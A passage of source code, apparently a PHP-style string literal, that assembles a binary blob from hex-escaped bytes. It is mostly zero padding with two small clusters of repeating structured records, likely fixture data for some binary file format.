"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFC\x98\x18\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xCD\xF5\x3C\x00". + "\xE5\x00\x00\x00\x00\x00\x00\xE5\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00". 
+ "\x3C\x00\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\xFB\x00\x00\x00\x00\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5". + "\xF5\xF5\x00\x00\x19\xB5\x28\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xE8\xF4\x1E\x00\xFC\x00\x00\x00\x00\x00\x00\xFC\x00\xF3". + "\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\x00\x1E\x00\x0D\x00\x00\x00\x00\x00\x00\x0D". + "\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\xE5\x2D\x30\x3E\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x99\x00\xB3\x00\x55\x00\x3E\xF0\x00\x50\x00\x38\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\x2D\x06\x58\x5A". + "\xEF\xFE\x76\x0C\x98\x3F\x60\xCE\x2A\xC7\x64\xAA\xFF\xBA\x34\x25\x80\xFC\x9C\x18\xDF\xED\x83\x2E\x27\xE6\x00\x60\x00\x5A\x00\x50". + "\x00\x29\xEA\x00\x61\x00\xC4\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA\x96\x11\x6E\x13\x80\x8A\xBA\xD5\xF3\xCE\x9C\xCF\xDE\xC9\x90\xBD". + "\x46\xB9\x97\x34\x87\x0C\x1A\xE7\x3C\xEC\xD7\x29\x0A\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x26\x01\x22\x00". + "\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00". + "\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01". + "\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x91". + "\x2E\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xCF\xF5\x3C\x00\xE7\x00\x00\x00\x00\x00\x00\xE7\x00\xFB\x00\x00\x00\x00\xFB\x00". + "\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\x00\x3C\x00\x1A\x00\x00\x00\x00\x00\x00\x1A\x00\xFB\x00\x00\x00\x00". + "\xFB\x00\xBD\xF3\xF7\x02\xFF\xFD\xB8\xF7\x00\x00\xF5\x00\x00\xF5\xF5\xF5\x00\x00\x33\xAE\x72\x9D\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\xF5\xE9\xF4\x1E\x00\xFD\x00\x00\x00\x00\x00\x00\xFD\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5\x00\x00". + "\xF4\x00\x00\xF4\xF4\x00\x1E\x00\x0D\x00\x00\x00\x00\x00\x00\x0D\x00\xF3\x00\x00\x00\x00\xF3\x00\xD0\xF7\xF5\x01\xF1\xF0\x5C\xF5". + "\x00\x00\xF4\x00\x00\xF4\xF4\xF4\x00\x00\x22\x3F\x5C\x1D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x00\xB3\x00\x55\x00\x3E\xF0\x00". + "\x50\x00\x38\x00\x6E\xA0\x5E\x50\x54\xF0\x0A\x2D\xCB\x7F\xB2\x71\x44\xF1\xD1\x51\x98\x3F\x60\xCE\x2A\xC7\x64\x4C\xFF\xC9\x34\xB0". + "\xED\xFC\x24\x18\xA5\xED\x5A\x2E\x51\xE6\x00\x60\x00\x5A\x00\x50\x00\x29\xEA\x00\x61\x00\xC4\x00\xB8\x55\xAA\xA4\xA0\xF1\xB3\xDA". + "\x46\xF7\x33\x8D\x6D\xBD\xDA\x9A\xF3\xCE\x9C\xCF\xDE\xC9\x90\x59\x46\xCB\x97\xA2\xE8\x0C\xA3\xE7\x47\xEC\x0F\x29\x7F\x12\x00\xFF". + "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x27\x01\x22\x00\x1B\x00\x00\x00\x00\x00\x00\x1B\x00\x08\x00\x00\x00\x00\x08\x00". + "\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x00\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00". + "\x08\x00\x6D\x04\x02\x03\x0E\x0D\xE4\x02\x00\x00\x01\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
